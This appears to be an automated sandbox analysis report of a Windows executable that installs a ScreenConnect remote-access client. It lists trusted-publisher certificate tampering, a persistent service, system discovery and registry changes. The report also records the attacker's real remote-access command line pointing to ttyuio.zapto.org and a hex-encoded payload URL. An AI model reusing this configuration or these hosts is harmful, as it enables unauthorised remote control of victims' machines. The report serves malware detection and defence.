8b5572bd0a7f8a323893cfaffa8dec5b904ef94c24b1e8636659d2eba472ddc0

Analysis

max time kernel
125s
max time network
132s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
02-10-2024 01:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8b5572bd0a7f8a323893cfaffa8dec5b904ef94c24b1e8636659d2eba472ddc0.exe
Size

81KB
MD5

31207e0a3811ea7b73b8c28719fa2d45
SHA1

d5269231a3bb92a70cead4651a18cd30f32d3449
SHA256

8b5572bd0a7f8a323893cfaffa8dec5b904ef94c24b1e8636659d2eba472ddc0
SHA512

2b2b454516b68a0af9c3f9080048ebeae78f592d2926d270b11fcfd7eef8592e422c83ac3c16ae9dfded7c9448c3459f3431160931cd662d0d3b0b138007234a
SSDEEP

1536:xoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYD7UxD2c:renkyfPAwiMq0RqRfbaxZJYYD7c

Score

8^/10

discovery persistence

Malware Config

Signatures

Manipulates Digital Signatures 1 TTPs 2 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	8b5572bd0a7f8a323893cfaffa8dec5b904ef94c24b1e8636659d2eba472ddc0.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	8b5572bd0a7f8a323893cfaffa8dec5b904ef94c24b1e8636659d2eba472ddc0.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e6a895d5-7436-4037-95a5-30f3fd4bcb96)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\R57MP0LP.L1O\\QXT8BJ3V.ZNE\\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\\ScreenConnect.ClientService.exe\" \"?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e6a895d5-7436-4037-95a5-30f3fd4bcb96&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAAcSroHjuo0iEc7XclwMoRgAAAAACAAAAAAAQZgAAAAEAACAAAACE4vwKf9HJP1cu6oRq560szZG6GgGxx5CyqA2zcYJ1oAAAAAAOgAAAAAIAACAAAACqLxY%2bFQgoZEmtOZ1Xt8finbSB%2bXCsEU6kmg1sefqac6AEAABAcXRSX%2bAmE87GyaMuwuXrl49A1TcrtX3pmzwriGTzGK5RnYZ5aISkr%2b6j9TjEUYTqrcR1YyPn2JfcDrjKRxMsy32TU974gsmorc4RIibQSWO%2fy6v8GQCtsRsw6mg%2bspc%2f%2fjNBhdKknK0h52SCZNjVRY2ql2JbY%2f4NVYxetA7IAcUTxtzdWXsrwJyyfMKKlLPD%2bPv%2fE06sj6X%2fQkx7M1CQIQHFTMhAp7npDKOoR5Yhou4zVNw7OyJ8Vp%2bjdBBmYJ9jof9YpA74RnySPYwkFSR1OcsT81PPT22yG%2bn8zv%2bg5J55PzSda0INrFYjTKIzDVpy8QF86Gc9wgs5Y43BqH23%2fspRYN9pIoquUBl1XjNigkPCTZfpZ20bE6l5SIy0DIP9n%2fDGAm42bOTFZrLSSziFNtkczjEiFbtapEtuyppaiEh8QAEmR%2f%2bwOtXtUSg1Xfn7KkOKMTrU0z4zgjUjY%2bvMpAodTnDk5rwcXk30qwKWjBDQDQU%2bmIPZ1A4Ah671h6L%2fJOTxVebr9G7bZdQrTAhug1SF%2bgnj6rl7TY4O%2b%2bPjWHxCwihVEMLnwSEPTI8BToodJ9fkLM1yWciaEdE5ENXpIa%2b69h3EWcPKqT1%2bpUhhRtyOfSWZuY6MXAQSTV1mMMV01Yxo9G1hn9XBSzAu%2bjebsBbTiAh0pU%2boyjd%2b638FzHtDtYHF%2fTl3QoOQL0c4K6mG5ji0D0CmRHm0Jb4IG8wdB1NKyi8dY9vdv5slz8073ppMsOzHazKjKmUmbTteVvXDGfHwtaoz%2fWNXgbFyd%2f4rHyWkRQJfmWn7CRVFA0mLSzlOl0PuRxyKZQTavpmZrc8s8aQt0hNKspXgje7Sq2Kfg0a3qKyb7DfhoTaqDT4wHXbpCbse%2bB%2bJ36vXNw%2b8ps8tjmctFgA0VGAM9JzPL2RI%2b94d6m129DZmefoKfcfYRkR5rJoTGgj2YXX0fBMZxzlu6uirusJCw%2bPPNGUB5Fdg46PE%2byspTRiCEG%2fpbX3EaEdGRcgXzSw4YwABRj7c7AG6qzMj7w4nyPkKLE8wGUx9peu13k97N17jus2iip3ViAoL%2fPl8UqsXyWVWit0GJSCNORMducd9G2%2bFs8JT3eD0qnVwA%2bnj%2bHqdzLiIpfmNZRJWANnukzKazDB9A0YviXfe6BuxFei%2bZVHMfH1%2bRi5bXmzqg1dVkTNF2RctyR4nIxkFBScg4%2fB2ChFgyfQMjNYoQ%2bUDihC2whErvphbKyBuNn6iGvIw2sn7btc4qiboKW52eAX%2beO3mbVnYutciz9g5gIfHctGTn1bFViRaBo4ePt5hBArGkW5CBS1n0RSGbnLe6PCfgS3b6xxLCl64bzOGw%2bTpyMWTV%2fyHkc75HSzPM8hoCD5yHH6cO3sVMr4ud1gwr4lGb8CC7R1peWAu%2fTAtygt73UBB1BRzOOgCYC1WHkJBb8cSk1Bdn0tL52%2bB8ldWvbiq03MJmQVxL7%2bK953RdJR2liFonEKkv8VW2vBRCqURZhnxLxsRDI2cLnT025quNEN1emIEUnOjHX7ZSwWIjkfPXl9vGutFPQojGtH79kvZYPFxt9eLur0HBi8DnUAAAAA8WqfD6PnK9BLMmu0yZ5XSTpq%2blZXI2qLlcmkTvEI0uKsAkMwzuMOeSPbKknS6x%2f1cfSJXUFzZglyQL%2frWecWk&r=&i=Untitled%20Session\" \"1\""	ScreenConnect.ClientService.exe

Downloads MZ/PE file

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File opened for modification	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	ScreenConnect.WindowsClient.exe

Executes dropped EXE 5 IoCs

pid	Process
4568	ScreenConnect.WindowsClient.exe
5092	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe
4216	ScreenConnect.WindowsClient.exe
1464	ScreenConnect.WindowsClient.exe

Loads dropped DLL 16 IoCs

pid	Process
5092	ScreenConnect.ClientService.exe
5092	ScreenConnect.ClientService.exe
5092	ScreenConnect.ClientService.exe
5092	ScreenConnect.ClientService.exe
5092	ScreenConnect.ClientService.exe
5092	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe
3644	ScreenConnect.ClientService.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3276	4628	WerFault.exe	90

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8b5572bd0a7f8a323893cfaffa8dec5b904ef94c24b1e8636659d2eba472ddc0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe

Modifies data under HKEY_USERS 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\lock!010000007a53580ec8120000741300000000000000000000 = 30303030313263382c30316462313436396630373661346635	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aa	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\SizeOfStronglyNamedComponent = 3c72080000000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Installations	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\lock!160000003f55580ed8110000bc0600000000000000000000 = 30303030313164382c30316462313436396633373839356335	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd\LastRunVersion = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	ScreenConnect.WindowsClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\ComponentStore_RandomString = "R57MP0LPL1OQXT8BJ3VZNEM0"	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\NonCanonicalData	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 460061006c00730065000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\lock!140000003f55580ed8110000bc0600000000000000000000 = 30303030313164382c30316462313436396633373839356335	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 680074007400700073003a002f002f0063006c006f0075006400660069006c00650073002d007300650063007500720065002e0069006f002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e003f0065003d0053007500700070006f0072007400260079003d0047007500650073007400260068003d00740074007900750069006f002e007a006100700074006f002e006f0072006700260070003d003800300034003100260073003d00650036006100380039003500640035002d0037003400330036002d0034003000330037002d0039003500610035002d0033003000660033006600640034006200630062003900360026006b003d0042006700490041004100410043006b004100410042005300550030004500780041004100670041004100410045004100410051004300700044004c004a00620042003200550043004a0051005300540037004a00250032006200650041004c00340053005200780042004e00390046006e00470044006d007a0075005300530065002500320066006a0048002500320062006e004b00420065004f0051004600480051002500320062004300720033004c0079007000440031004b0053006200310037006f0052005700500034007a0056004800790037004200540035003800350079007a00490064007400450073004c004f0051004a0047005600550077007a006500490046005700610041004b0077004b006600420073004800470025003200660068003800470059005600740038003500570031006f0049005600750044003000680065004a006d004a00740071004500640063004f006a005800760058005000440034006f004a007500510048006f00710068004200620059004c006f0053006e0073006200660072005400500030005200300034003000250032006200630066006b0043004e0073006c007600750066003000310063006e0073006200630041006500790055004500460052004b0049007a0025003200620038006f00300059004a0077007200690078004500360076006400520062003500630078006e00250032006200610075005600330036006d0039003200250032006200360025003200660068004e0043003500730052007a004d00340035004800720031004600550034003700770041003400720041005200610038004f006e00410043005900610066007000330032006a00450033007400320043006d003700450045006b004d00740025003200620053003600480057004b00670061005a004d007000300056004c006b004200670050007700330057006e005000380035006600680073006c0059004e00390055007a00330045005a007400730042006e002500320066003900370043004600450032006a00530041007600340025003200620072006400670049006d00410033006e0061003800260072003d00260069003d0055006e007400690074006c0065006400250032003000530065007300730069006f006e000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\identity = 53637265656e436f6e6e6563742e57696e646f77732c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\lock!06000000a354580ec8120000741300000000000000000000 = 30303030313263382c30316462313436396630373661346635	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\lock!0a0000003f55580ed8110000bc0600000000000000000000 = 30303030313164382c30316462313436396633373839356335	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide	ScreenConnect.WindowsClient.exe
